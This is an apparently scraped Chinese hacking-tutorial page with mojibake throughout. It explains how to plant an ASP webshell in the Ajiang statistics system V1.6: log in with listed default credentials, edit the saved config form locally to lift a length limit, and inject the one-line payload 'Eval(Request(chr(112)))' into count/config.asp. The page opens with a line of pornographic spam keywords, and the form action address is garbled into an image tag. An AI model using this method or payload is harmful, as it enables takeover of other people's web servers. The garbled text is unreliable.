亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

阿江統(tǒng)計(jì)系統(tǒng)V1.6后臺(tái)拿SHELL的方法

  發(fā)布時(shí)間:2011-03-31 22:35:47   作者:佚名   我要評(píng)論
因是大約一個(gè)月前在刀客的群里 看到刀客大牛用這個(gè)統(tǒng)計(jì)系統(tǒng)拿下了一個(gè)SHELL 那個(gè)時(shí)候我沒(méi)怎么注意 因?yàn)槠綍r(shí)碰到這樣的站很少 也就沒(méi)聽大牛們的詳細(xì)思路了!

無(wú)奈到了自己這里今天下午又碰到個(gè)一樣的站 糾結(jié)···

不多說(shuō)了 首先感謝小帆同學(xué) 豬豬同學(xué)對(duì)程序代碼的分析·(我自己硬是整了半個(gè)小時(shí)沒(méi)整出來(lái)利用方法·)

此后臺(tái)默認(rèn)的賬號(hào)密碼是 admin admin ,  ITlearner  ITlearner

先進(jìn)后臺(tái)

來(lái)到修改配置界面 保存源文件到本地

本地打開源文件 找到原文章訪問(wèn)量 把maxlength="10 修改為 maxlength="100  下邊是修改后的截圖

然后在本地文件修改action地址 例如IE 中的提交地址是upload/2011/1/201101071923425208.jpg" width="581" onload="resizepic(this)" height="50" alt="" />

然后保存文件 用IE 打開 在網(wǎng)站訪問(wèn)量地址后寫入  0:Eval(Request(chr(112)))

 

這個(gè)一句話的密碼是P  點(diǎn)擊修改 一句話就被插到了 count/config.asp 這個(gè)文件了 打開一句話客戶端就可以連接了

只是個(gè)自己積累的小小的過(guò)程 對(duì)于網(wǎng)上關(guān)于阿江統(tǒng)計(jì)拿SHELL的方法我也測(cè)試了很多 但是沒(méi)幾個(gè)能成功的 所以專門寫了這個(gè)文章出來(lái) 其實(shí)就是本地修改下字節(jié) 因?yàn)樵闯绦蛑邢拗屏藢懭氲淖止?jié)數(shù) 沒(méi)有什么技術(shù)含量 不要罵我···

文章作者:冰魚

相關(guān)文章

最新評(píng)論